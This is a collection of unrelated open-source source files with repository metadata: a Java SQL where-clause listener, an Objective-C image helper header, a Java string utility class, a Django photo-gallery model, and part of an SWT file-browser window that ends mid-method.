public void operatorNot() {
sb.append( " NOT " );
}
public void operatorOr() {
sb.append( " OR " );
}
public String transformAttribute(String name) throws MorseException {
Object[] obj = desc.attrMap.get( name );
if ( obj == null )
throw new MorseException( MorseException.UNKNOWN_ATTRIBUTE, name );
if ( obj.length == 0 )
throw new MorseException( MorseException.ATTR_AMBIGIOUS, name );
String tName = (String)obj[3];
/*
int pos = tName.indexOf('.');
if ( pos < 0 )
tName = IAttribute.M_ID;
else
tName = tName.substring( 0, pos + 1 ) + IAttribute.M_ID;
*/
return driver.getColumnName( tName );
// return SqlUtils.checkAttribute( driver, null, name, desc, user );
}
public Object transformValue( String attrName, String name) throws MorseException {
if ( ! AttributeUtil.isValue( name ) )
throw new MorseException( MorseException.WRONG_VALUE_FORMAT, name );
if ( attrName != null ) {
Object[] obj = desc.attrMap.get( attrName.toLowerCase() );
if ( obj != null && obj.length != 0 && obj[1] != null ) {
IAttribute attr = (IAttribute)obj[1];
String value = name;
if ( name.length() > 1 && name.charAt( 0 ) == '\'' && name.charAt( name.length() - 1 ) == '\'' )
value = ASql.unescape( name.substring( 1, name.length() - 1 ) );
if ( ! attr.getAco().validate( value ) )
throw new MorseException( MorseException.ATTR_VALUE_NOT_VALIDE, new String[] { attrName, name } );
return SqlUtils.getValueRepresentation( driver, attr, value );
} else {
IAttribute attr = IAttributeDefault.getAttribute( attrName );
if ( attr != null )
return SqlUtils.getValueRepresentation( driver, attr, name );
}
}
return name;
}
}
| mhus/mhus-inka | de.mhus.app.inka.morse.server/src/de/mhu/com/morse/channel/sql/WhereSqlListener.java | Java | apache-2.0 | 10,620 |
//
// UIImage+Image.h
// 生日管家
//
// Created by yz on 15/7/6.
// Copyright (c) 2015年 yz. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface UIImage (Image)
// 根据颜色生成一张尺寸为1*1的相同颜色图片
+ (UIImage *)imageWithColor:(UIColor *)color;
// 拉伸图片
+ (UIImage *)resizedImageWithName:(NSString *)name;
+ (UIImage *)resizedImageWithName:(NSString *)name left:(CGFloat)left top:(CGFloat)top;
// 返回一张未渲染的图片
+ (instancetype)imageWithRenderingModeOriginal:(NSString *)imageName;
// 对图片压缩
+ (UIImage *)imageCompressForSize:(UIImage *)sourceImage targetSize:(CGSize)size;
// 对图片压缩2
+ (UIImage *)resizeImage:(UIImage *)image toWidth:(CGFloat)width height:(CGFloat)height;
// 把图片按比例压缩
+ (instancetype)zoomImage:(UIImage *)image toScale:(CGFloat)scale;
// 把图片压缩到buttonItem大小
+ (UIImage *)resizeImageToBarButtonItemSize:(UIImage*)image;
@end
| LHJ-K2S/KSPhotoBrowserDemo | KSPhotoBrowser/Classes/Tool/UIImage+Image.h | C | apache-2.0 | 986 |
/*
* Copyright 2016 Code Above Lab LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.codeabovelab.dm.common.utils;
import java.util.function.Function;
import java.util.function.IntPredicate;
import java.util.function.Supplier;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*/
public class StringUtils {
private StringUtils() {
}
public static String before(String s, char c) {
return beforeOr(s, c, () -> {
// we throw exception for preserve old behavior
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
});
}
/**
* Return part of 's' before 'c'
* @param s string which may contain char 'c'
* @param c char
* @param ifNone supplier of value which is used when 'c' is not present in 's' (null not allowed)
* @return part of 's' before 'c' or 'ifNone.get()'
*/
public static String beforeOr(String s, char c, Supplier<String> ifNone) {
int pos = s.indexOf(c);
if(pos < 0) {
return ifNone.get();
}
return s.substring(0, pos);
}
public static String after(String s, char c) {
int pos = s.indexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(pos + 1);
}
public static String beforeLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(0, pos);
}
public static String afterLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
throw new IllegalArgumentException("String '" + s + "' must contains '" + c + "'.");
}
return s.substring(pos + 1);
}
/**
* Split string into two pieces at last appearing of delimiter.
* @param s string
* @param c delimiter
* @return null if string does not contains delimiter
*/
public static String[] splitLast(String s, char c) {
int pos = s.lastIndexOf(c);
if(pos < 0) {
return null;
}
return new String[] {s.substring(0, pos), s.substring(pos + 1)};
}
/**
* Split string into two pieces at last appearing of delimiter.
* @param s string
* @param delimiter delimiter
* @return null if string does not contains delimiter
*/
public static String[] splitLast(String s, String delimiter) {
int pos = s.lastIndexOf(delimiter);
if(pos < 0) {
return null;
}
return new String[] {s.substring(0, pos), s.substring(pos + delimiter.length())};
}
/**
* Return string which contains only chars for which charJudge give true.
* @param src source string, may be null
* @param charJudge predicate which consume codePoint (not chars)
* @return string, null when incoming string is null
*/
public static String retain(String src, IntPredicate charJudge) {
if (src == null) {
return null;
}
final int length = src.length();
StringBuilder sb = new StringBuilder(length);
for (int i = 0; i < length; i++) {
int cp = src.codePointAt(i);
if(charJudge.test(cp)) {
sb.appendCodePoint(cp);
}
}
return sb.toString();
}
/**
* Retain only characters which is {@link #isAz09(int)}
* @param src source string, may be null
* @return string, null when incoming string is null
*/
public static String retainAz09(String src) {
return retain(src, StringUtils::isAz09);
}
/**
* Retain chars which is acceptable as file name or part of url on most operation systems. <p/>
* It: <code>'A'-'z', '0'-'9', '_', '-', '.'</code>
* @param src source string, may be null
* @return string, null when incoming string is null
*/
public static String retainForFileName(String src) {
return retain(src, StringUtils::isAz09);
}
/**
* Test that specified codePoint is an ASCII letter or digit
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isAz09(int cp) {
return cp >= '0' && cp <= '9' ||
cp >= 'a' && cp <= 'z' ||
cp >= 'A' && cp <= 'Z';
}
/**
* Test that specified codePoint is an ASCII letter, digit or hyphen '-'.
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isAz09Hyp(int cp) {
return isAz09(cp) || cp == '-';
}
/**
* Test that specified codePoint is an ASCII letter, digit or hyphen '-', '_', ':', '.'. <p/>
* It common matcher that limit alphabet acceptable for our system IDs.
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isId(int cp) {
return isAz09(cp) || cp == '-' || cp == '_' || cp == ':' || cp == '.';
}
public static boolean isHex(int cp) {
return cp >= '0' && cp <= '9' ||
cp >= 'a' && cp <= 'f' ||
cp >= 'A' && cp <= 'F';
}
/**
* Chars which is acceptable as file name or part of url on most operation systems. <p/>
* It: <code>'A'-'z', '0'-'9', '_', '-', '.'</code>
* @param cp codePoint
* @return true for specified chars
*/
public static boolean isForFileName(int cp) {
return isAz09(cp) || cp == '-' || cp == '_' || cp == '.';
}
/**
* Invoke {@link Object#toString()} on specified argument, if arg is null then return null.
* @param o
* @return null or result of o.toString()
*/
public static String valueOf(Object o) {
return o == null? null : o.toString();
}
/**
* Test that each char of specified string match for predicate. <p/>
* Note that it method does not support unicode, because it usual applicable only for match letters that placed under 128 code.
* @param str string
* @param predicate char matcher
* @return true if all chars match
*/
public static boolean match(String str, IntPredicate predicate) {
final int len = str.length();
if(len == 0) {
return false;
}
for(int i = 0; i < len; i++) {
if(!predicate.test(str.charAt(i))) {
return false;
}
}
return true;
}
/**
* Is a <code>match(str, StringUtils::isAz09);</code>.
* @param str string
* @return true if string match [A-Za-z0-9]*
*/
public static boolean matchAz09(String str) {
return match(str, StringUtils::isAz09);
}
/**
* Is a <code>match(str, StringUtils::isAz09Hyp);</code>.
* @param str string
* @return true if string match [A-Za-z0-9-]*
*/
public static boolean matchAz09Hyp(String str) {
return match(str, StringUtils::isAz09Hyp);
}
/**
* Is a <code>match(str, StringUtils::isId);</code>.
* @param str string
* @return true if string match [A-Za-z0-9-_:.]*
*/
public static boolean matchId(String str) {
return match(str, StringUtils::isId);
}
public static boolean matchHex(String str) {
return match(str, StringUtils::isHex);
}
/**
* Replace string with pattern obtaining replacement values through handler function. <p/>
* Note that it differ from usual Pattern behavior when it process replacement for group references,
* this code do nothing with replacement.
* @param pattern pattern
* @param src source string
* @param handler function which take matched part of source string and return replacement value, must never return null
* @return result string
*/
public static String replace(Pattern pattern, String src, Function<String, String> handler) {
StringBuilder sb = null;
Matcher matcher = pattern.matcher(src);
int pos = 0;
while(matcher.find()) {
if(sb == null) {
// replacement can be a very rare operation, and we not need excess string buffer
sb = new StringBuilder();
}
String expr = matcher.group();
String replacement = handler.apply(expr);
sb.append(src, pos, matcher.start());
sb.append(replacement);
pos = matcher.end();
}
if(sb == null) {
return src;
}
sb.append(src, pos, src.length());
return sb.toString();
}
}
| codeabovelab/haven-platform | common/common-utils/src/main/java/com/codeabovelab/dm/common/utils/StringUtils.java | Java | apache-2.0 | 9,252 |
from django.db import models
from django.utils.html import format_html
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.fields import ImageField
from sno.models import Sno
class SnoGalleries(models.Model):
class Meta:
verbose_name = 'Фотография в галереи СНО'
verbose_name_plural = 'Фотографии в галереи СНО'
name = models.CharField('Название фото', max_length=255, blank=True, null=True)
photo = ImageField(verbose_name='Фото', max_length=255)
description = models.TextField('Описание', blank=True, null=True)
sno = models.ForeignKey(Sno, verbose_name='СНО', on_delete=models.CASCADE)
date_created = models.DateField('Дата', auto_now_add=True)
def photo_preview(self):
img = get_thumbnail(self.photo, '75x75', crop='center')
return format_html('<a href="{}" target="_blank"><img style="width:75px; height:75px;" src="{}"></a>',
self.photo.url, img.url)
photo_preview.short_description = 'Фото'
def __str__(self):
return '%s (%s)' % (self.name, self.sno.short_name)
| glad-web-developer/zab_sno | src/sno_galleries/models.py | Python | apache-2.0 | 1,164 |
/*
* Copyright 2015 Namihiko Matsumura (https://github.com/n-i-e/)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.github.n_i_e.deepfolderview;
import java.awt.Toolkit;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;
import java.io.IOException;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.Date;
import org.eclipse.core.databinding.DataBindingContext;
import org.eclipse.core.databinding.beans.PojoProperties;
import org.eclipse.core.databinding.observable.Realm;
import org.eclipse.core.databinding.observable.value.IObservableValue;
import org.eclipse.jface.databinding.swt.SWTObservables;
import org.eclipse.jface.databinding.swt.WidgetProperties;
import org.eclipse.jface.viewers.TableViewer;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.DisposeEvent;
import org.eclipse.swt.events.DisposeListener;
import org.eclipse.swt.events.ModifyEvent;
import org.eclipse.swt.events.ModifyListener;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.graphics.Color;
import org.eclipse.swt.graphics.Point;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Button;
import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.Display;
import org.eclipse.swt.widgets.Label;
import org.eclipse.swt.widgets.Menu;
import org.eclipse.swt.widgets.MenuItem;
import org.eclipse.swt.widgets.ProgressBar;
import org.eclipse.swt.widgets.Shell;
import org.eclipse.swt.widgets.Table;
import org.eclipse.swt.widgets.TableColumn;
import org.eclipse.swt.widgets.TableItem;
import org.eclipse.swt.widgets.Text;
import org.eclipse.ui.forms.widgets.FormToolkit;
import org.eclipse.wb.swt.SWTResourceManager;
import com.github.n_i_e.dirtreedb.Assertion;
import com.github.n_i_e.dirtreedb.DBPathEntry;
import com.github.n_i_e.dirtreedb.PathEntry;
import com.github.n_i_e.dirtreedb.lazy.LazyRunnable;
import com.github.n_i_e.dirtreedb.lazy.LazyUpdater;
import com.github.n_i_e.dirtreedb.lazy.LazyUpdater.Dispatcher;
import com.ibm.icu.text.NumberFormat;
import com.ibm.icu.text.SimpleDateFormat;
public class SwtFileFolderMenu extends SwtCommonFileFolderMenu {
@SuppressWarnings("unused")
private DataBindingContext m_bindingContext;
protected Shell shell;
private FormToolkit formToolkit = new FormToolkit(Display.getDefault());
private Text txtLocation;
private Composite compositeToolBar;
private Table table;
private Label lblStatusBar;
private Composite compositeStatusBar;
private ProgressBar progressBar;
@Override protected Shell getShell() { return shell; }
@Override protected Table getTable() { return table; }
@Override protected Label getLblStatusBar() { return lblStatusBar; }
@Override protected ProgressBar getProgressBar() { return progressBar; }
public static void main(String[] args) {
final Display display = Display.getDefault();
Realm.runWithDefault(SWTObservables.getRealm(display), new Runnable() {
public void run() {
try {
final SwtFileFolderMenu window = new SwtFileFolderMenu();
window.open();
/*
display.asyncExec(new Runnable() {
public void run() {
TableItem tableItem = new TableItem(window.table, SWT.NONE);
tableItem.setText(new String[] {"C:\\", "2015-01-01 00:00:00", "1", "2", "3"});
TableItem tableItem_1 = new TableItem(window.table, SWT.NONE);
tableItem_1.setText(new String[] {"D:\\", "2014-01-01 00:00:00", "100", "200", "1"});
}
});*/
} catch (Exception e) {
e.printStackTrace();
}
}
});
}
public void open() {
Display display = Display.getDefault();
//createContents();
//shell.open();
//shell.layout();
while (!shell.isDisposed()) {
if (!display.readAndDispatch()) {
display.sleep();
}
}
}
public SwtFileFolderMenu() {
createContents();
shell.open();
shell.layout();
location = new NavigatableList<Location>();
location.add(new Location());
}
/**
* Create contents of the window.
*/
private void createContents() {
shell = new Shell();
shell.addDisposeListener(new DisposeListener() {
public void widgetDisposed(DisposeEvent arg0) {
Point p = shell.getSize();
PreferenceRW.setSwtFileFolderMenuWindowWidth(p.x);
PreferenceRW.setSwtFileFolderMenuWindowHeight(p.y);
}
});
shell.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/drive-harddisk.png"));
shell.setMinimumSize(new Point(300, 200));
shell.setSize(PreferenceRW.getSwtFileFolderMenuWindowWidth(), PreferenceRW.getSwtFileFolderMenuWindowHeight());
GridLayout gl_shell = new GridLayout(1, false);
gl_shell.verticalSpacing = 6;
gl_shell.marginWidth = 3;
gl_shell.marginHeight = 3;
gl_shell.horizontalSpacing = 6;
shell.setLayout(gl_shell);
Menu menu = new Menu(shell, SWT.BAR);
shell.setMenuBar(menu);
MenuItem mntmFile = new MenuItem(menu, SWT.CASCADE);
mntmFile.setText(Messages.mntmFile_text);
Menu menuFile = new Menu(mntmFile);
mntmFile.setMenu(menuFile);
MenuItem mntmOpen_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpen_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
mntmOpen_1.setText(Messages.mntmOpen_text);
MenuItem mntmOpenInNew_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpenInNew_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenInNewWindowSelected(e);
}
});
mntmOpenInNew_1.setText(Messages.mntmOpenInNewWindow_text);
MenuItem mntmOpenDuplicateDetails_1 = new MenuItem(menuFile, SWT.NONE);
mntmOpenDuplicateDetails_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenDuplicateDetailsSelected(e);
}
});
mntmOpenDuplicateDetails_1.setText(Messages.mntmOpenDuplicateDetails_text);
MenuItem mntmCopyTo_2 = new MenuItem(menuFile, SWT.NONE);
mntmCopyTo_2.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo_2.setText(Messages.mntmCopyTo_text);
MenuItem mntmClose = new MenuItem(menuFile, SWT.NONE);
mntmClose.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCloseSelected();
}
});
mntmClose.setText(Messages.mntmClose_text);
MenuItem mntmQuit = new MenuItem(menuFile, SWT.NONE);
mntmQuit.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onQuitSelected();
}
});
mntmQuit.setText(Messages.mntmQuit_text);
MenuItem mntmEdit = new MenuItem(menu, SWT.CASCADE);
mntmEdit.setText(Messages.mntmEdit_text);
Menu menuEdit = new Menu(mntmEdit);
mntmEdit.setMenu(menuEdit);
MenuItem mntmRun_1 = new MenuItem(menuEdit, SWT.NONE);
mntmRun_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onRunSelected();
}
});
mntmRun_1.setText(Messages.mntmRun_text);
MenuItem mntmCopyAsString_1 = new MenuItem(menuEdit, SWT.NONE);
mntmCopyAsString_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyAsStringSelected();
}
});
mntmCopyAsString_1.setText(Messages.mntmCopyAsString_text);
MenuItem mntmCopyTo_1 = new MenuItem(menuEdit, SWT.NONE);
mntmCopyTo_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo_1.setText(Messages.mntmCopyTo_text);
MenuItem mntmVisibility = new MenuItem(menu, SWT.CASCADE);
mntmVisibility.setText(Messages.mntmVisibility_text);
Menu menuVisibility = new Menu(mntmVisibility);
mntmVisibility.setMenu(menuVisibility);
final MenuItem mntmFoldersVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmFoldersVisible.setSelection(true);
mntmFoldersVisible.setText(Messages.mntmFoldersVisible_text);
final MenuItem mntmFilesVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmFilesVisible.setSelection(true);
mntmFilesVisible.setText(Messages.mntmFilesVisible_text);
final MenuItem mntmCompressedFoldersVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmCompressedFoldersVisible.setSelection(true);
mntmCompressedFoldersVisible.setText(Messages.mntmCompressedFoldersVisible_text);
final MenuItem mntmCompressedFilesVisible = new MenuItem(menuVisibility, SWT.CHECK);
mntmCompressedFilesVisible.setSelection(true);
mntmCompressedFilesVisible.setText(Messages.mntmCompressedFilesVisible_text);
MenuItem mntmHelp = new MenuItem(menu, SWT.CASCADE);
mntmHelp.setText(Messages.mntmHelp_text);
Menu menuHelp = new Menu(mntmHelp);
mntmHelp.setMenu(menuHelp);
MenuItem mntmOpenSourceLicenses = new MenuItem(menuHelp, SWT.NONE);
mntmOpenSourceLicenses.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
new SwtOpenSourceLicenses(shell, SWT.TITLE|SWT.MIN|SWT.MAX|SWT.CLOSE).open();
}
});
mntmOpenSourceLicenses.setText(Messages.mntmOpenSourceLicenses_text);
compositeToolBar = new Composite(shell, SWT.NONE);
compositeToolBar.setLayoutData(new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1));
compositeToolBar.setBackground(SWTResourceManager.getColor(SWT.COLOR_WIDGET_BACKGROUND));
compositeToolBar.setFont(SWTResourceManager.getFont("Meiryo UI", 12, SWT.NORMAL));
GridLayout gl_compositeToolBar = new GridLayout(5, false);
gl_compositeToolBar.horizontalSpacing = 0;
gl_compositeToolBar.verticalSpacing = 0;
gl_compositeToolBar.marginWidth = 0;
gl_compositeToolBar.marginHeight = 0;
compositeToolBar.setLayout(gl_compositeToolBar);
formToolkit.adapt(compositeToolBar);
formToolkit.paintBordersFor(compositeToolBar);
Button btnLeft = new Button(compositeToolBar, SWT.NONE);
btnLeft.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-previous.png"));
btnLeft.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onNavigatePreviousSelected(e);
}
});
btnLeft.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(btnLeft, true, true);
Button btnRight = new Button(compositeToolBar, SWT.NONE);
btnRight.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-next.png"));
btnRight.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onNavigateNextSelected(e);
}
});
btnRight.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(btnRight, true, true);
Button btnUp = new Button(compositeToolBar, SWT.NONE);
btnUp.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/go-up.png"));
btnUp.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onUpperFolderSelected(e);
}
});
formToolkit.adapt(btnUp, true, true);
txtLocation = new Text(compositeToolBar, SWT.BORDER);
txtLocation.addModifyListener(new ModifyListener() {
public void modifyText(ModifyEvent arg0) {
onLocationModified(arg0);
}
});
GridData gd_txtLocation = new GridData(SWT.FILL, SWT.CENTER, true, false, 1, 1);
gd_txtLocation.widthHint = 200;
txtLocation.setLayoutData(gd_txtLocation);
txtLocation.setFont(SWTResourceManager.getFont("Meiryo UI", 11, SWT.NORMAL));
formToolkit.adapt(txtLocation, true, true);
Button btnRefresh = new Button(compositeToolBar, SWT.NONE);
btnRefresh.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
refresh();
}
});
btnRefresh.setImage(SWTResourceManager.getImage(SwtFileFolderMenu.class, "/com/github/n_i_e/deepfolderview/icon/view-refresh.png"));
formToolkit.adapt(btnRefresh, true, true);
final TableViewer tableViewer = new TableViewer(shell, SWT.MULTI | SWT.BORDER | SWT.FULL_SELECTION | SWT.VIRTUAL);
table = tableViewer.getTable();
table.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, true, 1, 1));
//table = new Table(scrolledComposite, SWT.BORDER | SWT.FULL_SELECTION | SWT.VIRTUAL);
table.setHeaderVisible(true);
table.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onTableSelected(e);
}
@Override
public void widgetDefaultSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
formToolkit.adapt(table);
formToolkit.paintBordersFor(table);
final TableColumn tblclmnPath = new TableColumn(table, SWT.LEFT);
tblclmnPath.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnPath);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnPathSelected(tblclmnPath, e);
}
});
tblclmnPath.setWidth(230);
tblclmnPath.setText(Messages.tblclmnPath_text);
setTableSortDirection(tblclmnPath, "path", order);
final TableColumn tblclmnDateLastModified = new TableColumn(table, SWT.LEFT);
tblclmnDateLastModified.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDateLastModified);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDateLastModifiedSelected(tblclmnDateLastModified, e);
}
});
tblclmnDateLastModified.setWidth(136);
tblclmnDateLastModified.setText(Messages.tblclmnDateLastModified_text);
setTableSortDirection(tblclmnDateLastModified, "datelastmodified", order);
final TableColumn tblclmnSize = new TableColumn(table, SWT.RIGHT);
tblclmnSize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnSize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnSizeSelected(tblclmnSize, e);
}
});
tblclmnSize.setWidth(110);
tblclmnSize.setText(Messages.tblclmnSize_text);
setTableSortDirection(tblclmnSize, "size", order);
final TableColumn tblclmnCompressedsize = new TableColumn(table, SWT.RIGHT);
tblclmnCompressedsize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnCompressedsize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnCompressedsizeSelected(tblclmnCompressedsize, e);
}
});
tblclmnCompressedsize.setWidth(110);
tblclmnCompressedsize.setText(Messages.tblclmnCompressedesize_text);
setTableSortDirection(tblclmnCompressedsize, "compressedsize", order);
final TableColumn tblclmnDuplicate = new TableColumn(table, SWT.NONE);
tblclmnDuplicate.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDuplicate);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDuplicateSelected(tblclmnDuplicate, e);
}
});
tblclmnDuplicate.setWidth(35);
tblclmnDuplicate.setText(Messages.tblclmnDuplicate_text);
setTableSortDirection(tblclmnDuplicate, "duplicate", order);
final TableColumn tblclmnDedupablesize = new TableColumn(table, SWT.RIGHT);
tblclmnDedupablesize.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
table.setSortColumn(tblclmnDedupablesize);
if (table.getSortDirection() == SWT.UP) {
table.setSortDirection(SWT.DOWN);
} else {
table.setSortDirection(SWT.UP);
}
onTblclmnDedupablesizeSelected(tblclmnDedupablesize, e);
}
});
tblclmnDedupablesize.setWidth(110);
tblclmnDedupablesize.setText(Messages.tblclmnDedupablesize_text);
setTableSortDirection(tblclmnDedupablesize, "dedupablesize", order);
Menu popupMenu = new Menu(table);
table.setMenu(popupMenu);
MenuItem mntmRun = new MenuItem(popupMenu, SWT.NONE);
mntmRun.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onRunSelected();
}
});
mntmRun.setText(Messages.mntmRun_text);
MenuItem mntmOpen = new MenuItem(popupMenu, SWT.NONE);
mntmOpen.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenSelected(e);
}
});
mntmOpen.setText(Messages.mntmOpen_text);
MenuItem mntmOpenInNew = new MenuItem(popupMenu, SWT.NONE);
mntmOpenInNew.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenInNewWindowSelected(e);
}
});
mntmOpenInNew.setText(Messages.mntmOpenInNewWindow_text);
MenuItem mntmOpenDuplicateDetails = new MenuItem(popupMenu, SWT.NONE);
mntmOpenDuplicateDetails.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onOpenDuplicateDetailsSelected(e);
}
});
mntmOpenDuplicateDetails.setText(Messages.mntmOpenDuplicateDetails_text);
MenuItem mntmCopyAsString = new MenuItem(popupMenu, SWT.NONE);
mntmCopyAsString.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyAsStringSelected();
}
});
mntmCopyAsString.setText(Messages.mntmCopyAsString_text);
MenuItem mntmCopyTo = new MenuItem(popupMenu, SWT.NONE);
mntmCopyTo.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
onCopyToSelected();
}
});
mntmCopyTo.setText(Messages.mntmCopyTo_text);
MenuItem menuItem = new MenuItem(popupMenu, SWT.SEPARATOR);
menuItem.setText("Visibility");
final MenuItem mntmFoldersVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmFoldersVisible_1.setSelection(true);
mntmFoldersVisible_1.setText(Messages.mntmFoldersVisible_text);
mntmFoldersVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFoldersVisible.setSelection(mntmFoldersVisible_1.getSelection());
onFoldersVisibleChecked(mntmFoldersVisible.getSelection());
}
});
final MenuItem mntmFilesVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmFilesVisible_1.setSelection(true);
mntmFilesVisible_1.setText(Messages.mntmFilesVisible_text);
mntmFilesVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmFilesVisible.setSelection(mntmFilesVisible_1.getSelection());
onFilesVisibleChecked(mntmFilesVisible.getSelection());
}
});
final MenuItem mntmCompressedFoldersVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmCompressedFoldersVisible_1.setSelection(true);
mntmCompressedFoldersVisible_1.setText(Messages.mntmCompressedFoldersVisible_text);
mntmCompressedFoldersVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFoldersVisible.setSelection(mntmCompressedFoldersVisible_1.getSelection());
onCompressedFoldersVisibleChecked(mntmCompressedFoldersVisible.getSelection());
}
});
final MenuItem mntmCompressedFilesVisible_1 = new MenuItem(popupMenu, SWT.CHECK);
mntmCompressedFilesVisible_1.setSelection(true);
mntmCompressedFilesVisible_1.setText(Messages.mntmCompressedFilesVisible_text);
mntmCompressedFilesVisible_1.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(SelectionEvent e) {
mntmCompressedFilesVisible.setSelection(mntmCompressedFilesVisible_1.getSelection());
onCompressedFilesVisibleSelected(mntmCompressedFilesVisible.getSelection());
}
});
